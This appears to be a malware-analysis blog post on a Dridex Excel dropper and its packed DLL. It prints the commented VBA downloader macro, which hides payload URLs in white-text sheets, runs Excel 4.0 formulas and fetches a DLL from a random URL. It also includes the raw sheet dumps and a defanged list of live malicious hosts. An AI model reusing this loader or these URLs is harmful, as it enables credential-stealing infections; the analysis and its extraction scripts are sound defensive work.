Dridex (also known as Bugat and Cridex) is a banking trojan and infostealer operated by the criminal group referred to as Indrik Spider [1]. Dridex specializes in stealing banking credentials and is typically delivered through macro-enabled Microsoft Office documents such as Word and Excel files. In previously recorded incidents the threat actors have used a Dridex infection as the foothold for hitting high-value targets with ransomware [2].
This post reports the extracted code and URLs, along with other findings, from the latest Dridex sample, detected on 10 Feb 2021. The sample was reported by the security researcher Moto_Sato. The threat actor used techniques and procedures similar to those discussed in the previous posts [9][10].
This post is a skim analysis and overview of the latest sample; for the detailed steps and methods, read the previous posts.
File Name | SHA256 | File Size | Detected AVs |
---|---|---|---|
INV-6291941768.xlsm | 176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815 | 79.77 KB | 12/65 |
ujewngbg.dll | 1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38 | 989.00 KB | 7/67 |
fixed.bin | 2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42 | 1.05 MB | 32/70 |
Threat Overview of Dridex
Based on the analysis of the latest sample and public reports, the threat actor is using a VBA macro loader whose functions are left in clear text, hiding the payload URLs and formulas in the workbook's cells rather than obfuscating the macro code, in order to bypass AV detection [3].
Malware Analysis
1. Excel File
The XLSM file has four hidden sheets whose cell contents are written in white-colored characters, and the VBA project is locked with EvilClippy.
Macro VBA functions
```vba
' Win32 URLDownloadToFileA imported under an innocuous-looking alias (next_for_and).
#If VBA7 And Win64 Then
Private Declare PtrSafe Function next_for_and Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function next_for_and Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If

' Mid(ook, jo, 1): the single character at position jo (onn is always 1).
Function marball_a(ook As String, jo As Integer)
marball_a = Mid(ook, jo, onn)
End Function

' Random element of the array: ii = 2 - 1 = 1, so the index is 0..UBound(asd).
Function bussy_order(asd As Variant) As String
Randomize: ii = 2 - onn: bussy_order = asd(Int((UBound(asd) + ii) * Rnd))
End Function

' Main routine: rebuilds the hidden text, runs the embedded formulas, downloads the payload.
Sub fill_lines_u()
' Record separator "))))": part 0 is the URL list, part 1 the formula list.
parcking_list = Split(RTrim(level_recharge), refreshPage(")"))
' Defines the name "ms_excel" for cell A3 of the first sheet.
Sheets(onn).Cells(3, onn).Name = "ms_" & "excel"
' Formulas are separated by "++++".
mounthYYa = Split(parcking_list(1), refreshPage("+"))
For re = 0 To UBound(mounthYYa) - LBound(mounthYYa) + onn
On Error Resume Next
' Writes each formula into the named cell and executes it by calling Run() on the
' defined name, so the formula runs as an Excel 4.0 macro.
Sheets(onn).Cells(3, onn).value = "=" & mounthYYa(re)
fd = Len(po & ("" & (((((Run("" & "ms_" & "" & "excel"))))))))
' Iterations 12 and 14 read back what the formulas left in C2:C8:
' the download directory and the file name.
If re = 12 Then refas = sheetsAGT:
If re = 14 Then
add2020 = sheetsAGT
' URLs are separated by "HHHHh"; pick one at random, drop its leading junk
' character (Fuel_add) and download it to <directory>\<file name>.
next_for_and 0, Fuel_add(bussy_order(Split(parcking_list(0), refreshPage("H") & "h"))), refas & "\" & add2020, 0, 0
End If
Next
End Sub

' Constant cells in C2:C8 of the first sheet (values written there by the formulas).
Function sheetsAGT()
sheetsAGT = Sheets(onn).Range("C2:C8").SpecialCells(xlCellTypeConstants)
End Function

' Right(y, Len(y) - 1): strips the first character.
Public Function Fuel_add(y As String)
Fuel_add = Right(y, Len(y) - onn)
End Function

' Reassembles the hidden text: for every position, one character from sheet 5,
' then sheet 4, then sheet 3. Each sheet therefore holds every third character.
Function level_recharge()
Dim pockets_two As String
Dim chat_1_r As String: Dim swift_pay As String
Dim u As Integer: pockets_two = Nill_first(5)
chat_1_r = Nill_first(4): swift_pay = Nill_first(3)
For u = onn To Len(pockets_two)
empty_u = empty_u & marball_a(pockets_two, u) & marball_a(chat_1_r, u) & marball_a(swift_pay, u)
Next
level_recharge = RTrim(empty_u)
End Function

' Concatenates every constant cell in the used range of sheet rt.
Function Nill_first(rt As Integer)
For Each Q In Sheets(rt).UsedRange.SpecialCells(xlCellTypeConstants): table_last = table_last & Q: Nill_first = table_last
Next
End Function

Function po()
po = "Z"
End Function

Function onn()
onn = 1
End Function

' String(4, "Z") with "Z" replaced by u: the character u repeated four times.
Function refreshPage(u As String)
refreshPage = Replace(String(4, po), po, u)
End Function
```
The hidden sheets hold the characters of the payload strings, and the macro reads them back in order, one character from each of three sheets in turn, which is why each sheet dump below looks like every third character of the real text. The reassembled text forms a list of 50+ URLs, one of which is picked at random to download the malicious DLL. The full list of URLs is in Appendix A.
Sheet 1
ct:crruni…/h2.rHat:csai.liei.mbstHHhp/nvdaa9ckz.rHet:ts.mnggaHhts/dtoio1u.rHwt:bhynoltjaHhts/ee./jiaHhts/tneanito36aHhts/qt.uk5.pHht:dsnvsobdd.rHut:inl./q2aHhts/ooanrap1tHHhp/jaalnc/ewfaHhts/teorslodlvzHHhp/mot.m82xaHhts/ai.aadyez9diHhts/aeeomsoeir.mpm.pH1t:uui-e0whtpowa2tHHhp/an./6r.pHkt:w.w7.m9jriHhts/rcoesvec/2hrHHhp/eeiotnoom4.rHat:14omk6aHhts/tplci.m2xtHHhp/wi./mniHhts/nbtngvfiHhts/dtapkox.rH0t:miiln.m83xzHHhp/srpc/z8zHHhp/iyoq8aaHhts/mmscciouvtHHhp/aagnoocbx.pH3t:zutoeau/dltHHhp/ani.beac-klc/ivvaHhts/wtdgouwp.pHit:sknrrhuc/1mrHHhp/oig32zHHhp/oe.dc.mwptHHhp/c.pr8e8iHhts/eiitwsoq6.rH9t:39plkiwtpkowvvaHhts/etefiu3ziHhts/eac./o4aHhts/beuithrcc/8stHHhp/rndrc/uvtHHhp/wtrrtnlrteozbmtiHhts/voronlogj.pH2t:bwdsaea.liei.mmf9tHHhp/wagerbe10.rH5t:nardiog3.rHwt:ndrelisomwazHHhp/osprlta.mdh.rHrt:bn.se.nh9rHHhp/agitep8.rHyt:spt.lenptHHhp/lno.mupk.pHnt:n.srrc/yz2iHhts/abmhcogssputiHhts/icoobja)S.M"l,A1)+S.M"“J++TA(k,”+IIUESR(oG.RPE),CSFS)+ENEo,2++NLETE+S.M"“i)+AEK(U++TA(0”)+ENEodw"&&l"kc"k+S.M"g,hh""+S.M"“E(TOSC2,I(oi"EWKA()))“c"k”&l”“k++TAE2b+S.M”“E(ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67RD*5"l)+EVUCa++Lwb0SodwAmm"C&,v”&&"rh"v&,-"bb,++LCSFS
Sheet 2
hp/oi.rocczbx6rHHhp/outnsuosnc/craHhts/-ier-al3itHHhp/mpc/we.rHrt:mcagn/tttHHhp/egd.mdf.rHqt:uadeds.rHst:detnmu./gs.rHmt:muecbzuzHHhp/dime.mr4drHHhp/rfmijx.rHit:hrsr./x91aHhts/prhdgov1r.rHot:ltfwht.mfvoiHhts/amic/fw.rHut:lrnrlce.tvg.pHyt:arsaratsccoc/wxzHHhp/ninwk0eoa.m74gaHhts/u4cc5szHHhp/wpe6c/5q.pHpt:krtnpeisogf8aHhts/crnvi.m0kytHHhp/d.mtq.rHft:aoaohdc/6maHhts/wdnaf.pHet:fcohl28.pHvt:iurll1p7rHHhp/ovnucc/optiHhts/poeoqemiHhts/a.me0.rH4t:doaeeoni1haHhts/fnri.m8v3zHHhp/unst.mrb0saHhts/ldecitvabkiopg7.rHlt:dari.m3x3zHHhp/medoitrouc0aHhts/p./fdiHhts/nnceic/nmaHhts/te./9m.pHdt:anagad.mw3tHHhp/22rostiea.m4j.rH8t:tfulen5a.pH3t:cmbommn.rHqt:mi.atesveoak3aHhts/iapeogijaHhts/wheumttni…/q6.pH7t:dep.dc.milzHHhp/raiunmmsuosnc/bkraHhts/wlrnteyggtHHhp/ayvandagrHHhp/oxesuo./czoiHhts/rh.ciinc/ukrHHhp/uoctsf/keaHhts/rev./1wtHHhp/uoioi/xvaHhts/espc./syzHHhp/amsvsofvy.pHtt:cco.thli./wr.pH4t:pt.mn9.r)ENEclCR0)+ENEm,"+S.M"0")+FSMREC"“EWKA() LEAE++TA(0"”+CC.YR)+ENEh,l++NLETE+S.M"“O++TA(hf"hh"E&&u&)+ENEwb”"kl)+ENEb,FG.RPE3(N"an,TOSC2,-)La&0Tclm&0+S.L(,)+ENEa,FCRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)A(8).l++TAE2b+CLe&,"hf&“AACCm00ph”,"kgro"s&&,0+FELEAE
Sheet 3
ts/uebnteoausvaHhts/nlesocnlkoi8.rHdt:x-apru./yoaHhts/kroni1rHHhp/eal.fhzoaHhts/taec/crtHHhp/e.ucqfrHHhp/airtitiqhwtHHhp/yosl/q7iHhts/egoic./c6aHhts/aierprtHHhp/ogtaixct.rHpt:ahmoi.mi63rHHhp/illeoec/xu.pH8t:oracohvhtHHhp/enge-amn/gczHHhp/mrdmyerhhesodx9iHhts/stge.0bspc/5n.rHgt:beuh851iHhts/wor0ozm2zHHhp/oecctrc.myy.rHxt:thanaoc/vweaHhts/6c/jttHHhp/urusmtos0.rHot:w.jo2hzHHhp/ayo./p5zHHhp/nse./s7vaHhts/tefeeop9w.pH9t:rgu.mzc.pHjt:zpc/dytHHhp/e.xn…/13.rHst:lfsatc/s6viHhts/kflshbg54.rH7t:cerran-otaa.mzyprHHhp/inanc/30yiHhts/oagwco.mxf.rH0t:masrj.pH2t:cttonlomj.rH6t:chsbfcwzHHhp/gcdilyc/c4aHhts/7.ocmhnrrc/corHHhp/huri./iczHHhp/hl.mygbtHHhp/olqlycei.mxz.rH1t:ggru.m5k.rHzt:w.ecieaeavcnv50zHHhp/eleceic/ciiHhts/ornrciiocnlkof5c.rHtt:w.lea./5ryaHhts/vue./fxlaHhts/rtmotnrsya.pHbt:wkoaeoveoxp8aHhts/ywolsuom.rH6t:galesyr2aHhts/prtnnxp.rH5t:caceoas12iHhts/pgee.mlgxzHHhp/ohomenoeucjqzHHhp/htc/72r))TA(i"H(1++TA(A")+ENEh"++(NB(AHd,TOSC1),O(L)+S.M"“3)+AEK(U++TA(kcl+CC.YR)+ENEv,”+S.M"gw,“klxh"th++TA(e"S&&l++TA(bLTEWKA()FDRmgG.RPE311&olh&“i&ph)+EVUCb++TA(bLTH(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29,N)+&d”+S.L(,)+A(go”&gw",&&C"A,&“kn”&&s"0 ba0)+I.O(L)
Sheet 4
h25h3g70h8
After picking a random URL from the list, the payload is downloaded to a path under %TEMP% and loaded with regsvr32.exe. The regsvr32.exe process keeps running even after the Excel file is closed.
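The URL list can be recovered without enabling macros by replicating the reassembly outside Excel. The Python below is an added example written for this post, not the author's tooling or the HP script in [3]: it mirrors level_recharge() (one character from each of three sheets in turn) and the string handling in fill_lines_u() (split on "))))", then on "HHHHh", then drop the leading junk character as Fuel_add does). It runs on a constructed three-sheet sample, not the real workbook's cells; in practice the three sheet strings would be read from the hidden sheets, in the order the macro reads them (Sheets(5), Sheets(4), Sheets(3)).

```python
"""Rebuild the hidden sheet text the way the Dridex macro does and pull out the URL list."""
from itertools import zip_longest

# The macro builds each separator with refreshPage(): one character repeated four times.
RECORD_SEP = ")" * 4        # refreshPage(")") splits the URL list from the formula list
URL_SEP = "H" * 4 + "h"     # refreshPage("H") & "h" separates the URLs
FORMULA_SEP = "+" * 4       # refreshPage("+") separates the formulas


def deinterleave(sheet_5: str, sheet_4: str, sheet_3: str) -> str:
    """Mirror of level_recharge(): for each position take a char from sheet 5, then 4, then 3.

    Mid() past the end of a shorter sheet returns "", which zip_longest's fillvalue
    reproduces; RTrim becomes rstrip().
    """
    return "".join(a + b + c for a, b, c in zip_longest(sheet_5, sheet_4, sheet_3, fillvalue="")).rstrip()


def extract(blob: str):
    """Mirror of the string handling in fill_lines_u(): returns (urls, formulas)."""
    parts = blob.split(RECORD_SEP)
    if len(parts) < 2:
        raise ValueError("record separator not found: wrong sheet order or content")
    # Fuel_add() = Right(y, Len(y) - 1): every URL carries one leading junk character.
    urls = [u[1:] for u in parts[0].split(URL_SEP)]
    formulas = parts[1].split(FORMULA_SEP)
    return urls, formulas


def defang(url: str) -> str:
    """Make an extracted URL safe to paste into a report (hxxps://host[.]tld/...)."""
    scheme, sep, rest = url.partition("://")
    return scheme.replace("http", "hxxp") + sep + rest.replace(".", "[.]")


# ---- constructed sample (not data from the real workbook) ----
SAMPLE_URLS = [
    "https://files.example.invalid/a1b2c3.rar",
    "https://cdn.example.invalid/x9y8w7.tar",
    "https://dl.example.invalid/q7w6e5.zip",
]
SAMPLE_FORMULAS = ["STEP.ONE()", "STEP.TWO()"]  # stand-ins for the real Excel 4.0 formulas


def interleave(text: str):
    """Inverse of deinterleave(): spreads a plaintext over three 'sheets' to build the sample."""
    return text[0::3], text[1::3], text[2::3]


def build_sample_sheets():
    """Three sheet strings as the macro would find them, built from the constructed plaintext."""
    junk = "a7k"  # one leading junk character per URL, which Fuel_add() strips
    url_blob = URL_SEP.join(j + u for j, u in zip(junk, SAMPLE_URLS))
    plaintext = url_blob + RECORD_SEP + FORMULA_SEP.join(SAMPLE_FORMULAS)
    return interleave(plaintext)


if __name__ == "__main__":
    urls, formulas = extract(deinterleave(*build_sample_sheets()))
    for u in urls:
        print(defang(u))
    print(f"{len(formulas)} formulas to run")
```

Reading the cells in the right order matters more than the splitting: if the three sheets are concatenated in any other order the record separator never appears and extract() raises instead of returning garbage.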
2. DLL File
The threat actor seems to use a different tool or technique each time to pack the same DLL that was seen in the previously analyzed samples [9][10]. However, the overall procedure to reverse engineer this part is the same, because the DLL unpacks itself through self-injection.
Even though none of the usual tools, such as Detect It Easy (DiE), identify the packer used on the malicious file, it is clear enough that something is hidden.
Self-injection is the method the threat actor has been using so far, and it makes extracting the packed payload simple for the analyst: load the DLL in x32dbg and set breakpoints on VirtualAlloc and VirtualProtect.
When the hidden stub is loaded, it contains clear-text strings referring to PowerShell. This appears to be a decoy meant to confuse the reverse engineering process: no PowerShell is used at this point, nor when the malicious file is run dynamically. In this example the stub code is loaded at 0x009F0000.
After that, the "packed", or more accurately the "overwritten", executable runs in memory at the same location where the original was first loaded in x32dbg, and the image can be dumped from memory. Since the dump comes from memory, its section raw addresses and sizes have to be fixed to match the virtual layout, using PE-bear or CFF Explorer, before it can be analyzed as a normal PE.
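The raw-address fix that PE-bear or CFF Explorer performs by hand can also be scripted. The Python below is an added example, not the author's workflow: it rewrites each section header of a memory dump so PointerToRawData equals VirtualAddress and SizeOfRawData covers the mapped section, and sets FileAlignment to SectionAlignment so the headers stay consistent. It is exercised on a constructed minimal PE32 laid out as a memory image; a real dump would be processed as `python unmap.py dump.bin fixed.bin` (the script name is an assumption).

```python
"""Fix a PE dumped from memory so its section raw offsets match the virtual layout."""
import struct
import sys

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes
# Optional-header field offsets shared by PE32 and PE32+.
OPT_SECTION_ALIGNMENT = 32
OPT_FILE_ALIGNMENT = 36
OPT_SIZE_OF_IMAGE = 56
OPT_SIZE_OF_HEADERS = 60


def _headers(image: bytes):
    """Locate the optional header and section table; raises if the blob is not a PE."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections, = struct.unpack_from("<H", image, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", image, e_lfanew + 20)
    opt_off = e_lfanew + 24
    return opt_off, opt_off + opt_size, num_sections


def sections(image: bytes):
    """[(name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData), ...]"""
    _, sec_off, n = _headers(image)
    out = []
    for i in range(n):
        f = SECTION_HDR.unpack_from(image, sec_off + i * SECTION_HDR.size)
        out.append((f[0].rstrip(b"\0").decode("ascii", "replace"), f[1], f[2], f[3], f[4]))
    return out


def alignments(image: bytes):
    """(SectionAlignment, FileAlignment) from the optional header."""
    opt_off, _, _ = _headers(image)
    return struct.unpack_from("<II", image, opt_off + OPT_SECTION_ALIGNMENT)


def unmap_dump(image: bytes) -> bytes:
    """Raw = Virtual: point each section's raw offset/size at where its bytes sit in the dump."""
    opt_off, sec_off, n = _headers(image)
    sec_align, = struct.unpack_from("<I", image, opt_off + OPT_SECTION_ALIGNMENT)
    buf = bytearray(image)
    for i in range(n):
        off = sec_off + i * SECTION_HDR.size
        name, vsize, va, _raw_size, _raw_ptr, *rest = SECTION_HDR.unpack_from(image, off)
        # In a mapped image the section occupies VirtualSize rounded up to SectionAlignment,
        # starting at VirtualAddress; clamp to the dump length for a truncated last section.
        mapped = -(-vsize // sec_align) * sec_align if sec_align else vsize
        raw_size = max(0, min(mapped, len(image) - va))
        SECTION_HDR.pack_into(buf, off, name, vsize, va, raw_size, va, *rest)
    # With raw == virtual, FileAlignment has to equal SectionAlignment.
    struct.pack_into("<I", buf, opt_off + OPT_FILE_ALIGNMENT, sec_align)
    return bytes(buf)


def build_mapped_sample() -> bytes:
    """Constructed PE32 laid out as in memory (headers at 0, sections at their VAs); not a real sample."""
    sec_align, file_align, e_lfanew = 0x1000, 0x200, 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # IMAGE_FILE_HEADER: i386, 2 sections, 224-byte PE32 optional header, EXECUTABLE|32BIT|DLL
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)               # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x10000000)           # ImageBase
    struct.pack_into("<I", opt, OPT_SECTION_ALIGNMENT, sec_align)
    struct.pack_into("<I", opt, OPT_FILE_ALIGNMENT, file_align)
    struct.pack_into("<I", opt, OPT_SIZE_OF_IMAGE, 0x3000)
    struct.pack_into("<I", opt, OPT_SIZE_OF_HEADERS, 0x400)
    # Section headers still carry the on-disk raw offsets a linker wrote (0x400, 0x600) ...
    text = SECTION_HDR.pack(b".text", 0x10, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    data = SECTION_HDR.pack(b".data", 0x08, 0x2000, 0x200, 0x600, 0, 0, 0, 0, 0xC0000040)
    image = bytearray(0x3000)
    hdr = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text + data
    image[:len(hdr)] = hdr
    # ... while the bytes themselves sit at their virtual addresses, as in a memory dump.
    image[0x1000:0x1010] = b"\x90" * 15 + b"\xC3"
    image[0x2000:0x2008] = b"constant"
    return bytes(image)


if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            fixed = unmap_dump(f.read())
        with open(sys.argv[2], "wb") as f:
            f.write(fixed)
    else:
        for s in sections(unmap_dump(build_mapped_sample())):
            print(s)
```

One caveat: if the dumped image ran at an address other than its ImageBase and relocations were already applied, ImageBase has to be updated as well so that static tools resolve pointers correctly. The author notes that in this sample the overwritten image ran at the original load address, so that step is not needed here.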
The fixed, dumped binary has been submitted to VT and AnyRun [7][8]. It appears to be the exact same DLL that was dumped in the previous analysis, with a little overhead of misleading code.
Appendix A
DO NOT run any of the URLs below.
hxxps://courier[.]burnnotice[.]co[.]za/buhxs26v[.]rar
hxxps://xn--viadeparra-u9a[.]cl/k3yzio[.]tar
hxxps://tmkspr[.]com/nnwige1g[.]rar
hxxps://medcatalog[.]info/h1tzuto[.]tar
hxxps://bethgayden[.]com/ldctfrj[.]tar
hxxps://ueea[.]edu[.]ec/dqjsfi[.]rar
hxxps://dateintrentaminuti[.]it/qogh3sw6[.]tar
hxxps://myquotes[.]club/kzq5u7[.]zip
hxxps://ddesignmoveis[.]com[.]br/d4cdd6[.]rar
hxxps://iranfilme[.]ir/jpqxr2[.]tar
hxxps://hoorgostaran[.]ir/xaxcp9t11[.]tar
hxxps://ajpharmaholding[.]com/vie16wr3f[.]rar
hxxps://littleflowerhostel[.]com/dfxlvuvo[.]zip
hxxps://omaromatic[.]com/h8fv2whx[.]tar
hxxps://learning[.]real-academy[.]net/zvg9gcd[.]zip
hxxps://amarresdeamorymaestroshechiceros[.]com/dpwxmx9[.]zip
hxxps://unsuiting-week[.]000webhostapp[.]com/w75a4n2g[.]tar
hxxps://bauen4u[.]ch/c8655rs1[.]zip
hxxps://www[.]power760[.]com/z95mjq2r[.]zip
hxxps://korrectconceptservices[.]com/gy2fyh8[.]rar
hxxps://techerainnovation[.]com/o0vmkw4ye[.]tar
hxxps://1d64[.]com/mtjkqt6[.]tar
hxxps://autorpauloschmidt[.]com/s260xm[.]tar
hxxps://www[.]idj[.]no/a2mfhn[.]zip
hxxps://fancybooth[.]nl/g2pv85f[.]zip
hxxps://industreal[.]pl/k1sop7x7v[.]rar
hxxps://motiveinfluence[.]com/p8o93pwxt[.]zip
hxxps://rspgroupe[.]com/qzzec8m[.]zip
hxxps://ziapy[.]com/qed80ya[.]tar
hxxps://demo[.]maxsence[.]co[.]in/oi1u13vh[.]tar
hxxps://laffansgranito[.]com/c8sbv6x3v[.]zip
hxxps://zukunftslotse[.]hamburg/b5d04ls[.]tar
hxxps://calendrier[.]cabinet-avocat-bakkali[.]com/pzigyv7pv[.]rar
hxxps://diwantrading[.]com/u33wx0p3y[.]zip
hxxps://smokeandgrowrichtour[.]com/ux1cfm0[.]rar
hxxps://mopai[.]sg/r3fj2d[.]zip
hxxps://content[.]codencil[.]com/mwnjpm[.]tar
hxxps://ccth[.]esp[.]br/f89cemw8[.]zip
hxxps://agenciadigitalwdys[.]com/qwc634[.]tar
hxxps://32792[.]prolocksmithwinterpark[.]com/w4cvjov[.]rar
hxxps://thefuturelife[.]in/u5i3acz[.]zip
hxxps://chemlab[.]com[.]my/mgonb4[.]tar
hxxps://mobile[.]qualitytechservice[.]com/ax8kzs3[.]tar
hxxps://grignardpure[.]com/g5uikvj[.]tar
hxxps://www[.]therecruitmentalternative[.]co[.]nz/vbq5m60t[.]zip
hxxps://developer[.]codencil[.]com/gicjli[.]zip
hxxps://browardinsurancemiami[.]solucioneslink[.]com/fmb5fkc9r[.]tar
hxxps://www[.]allgreenart[.]be/ey51gr0gy[.]tar
hxxps://navayurveda[.]in/odfgax3gl[.]rar
hxxps://nordxtremesolutions[.]ro/smcywzaao[.]zip
hxxps://workshop[.]arceliotivane[.]com/xduphk8[.]rar
hxxps://buynow[.]costless[.]fun/ohkm9e[.]rar
hxxps://garagelivet[.]se/yp1r8w2[.]tar
hxxps://supportit[.]online/xnxppv[.]tar
hxxps://cleanscope[.]com[.]au/sps1ky2[.]zip
hxxps://nap[.]mgsservers[.]com/flyvgzyx2[.]zip
hxxps://coachboom[.]mhtechnologies[.]us/cpwjurqt[.]zip
hxxps://phittc[.]com/on7b92j[.]rar
References
[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider
[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/
[3] Dridex Malicious Document Analysis: Automating the Extraction of Payload URLs, https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/
[4] Excel file from AnyRun, https://app.any.run/tasks/3d132db7-78d1-40bb-8b9f-86d9049a1107/#
[5] Excel File in VT, https://www.virustotal.com/gui/file/176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815/details
[6] DLL file in VT, https://www.virustotal.com/gui/file/1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38/detection
[7] Unpacked file submitted to VT, https://www.virustotal.com/gui/file/2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42/details
[8] Unpacked file submitted to AnyRun, https://app.any.run/tasks/8f8f954d-6c3c-415d-a9ff-fd0a50209afd
[9] Dridex-malware-analysis [1 Feb 2021]
[10] Dridex-malware-analysis [8 Feb 2021]
Article Link: https://aaqeel01.wordpress.com/2021/02/10/dridex-malware-analysis-10-feb-2021/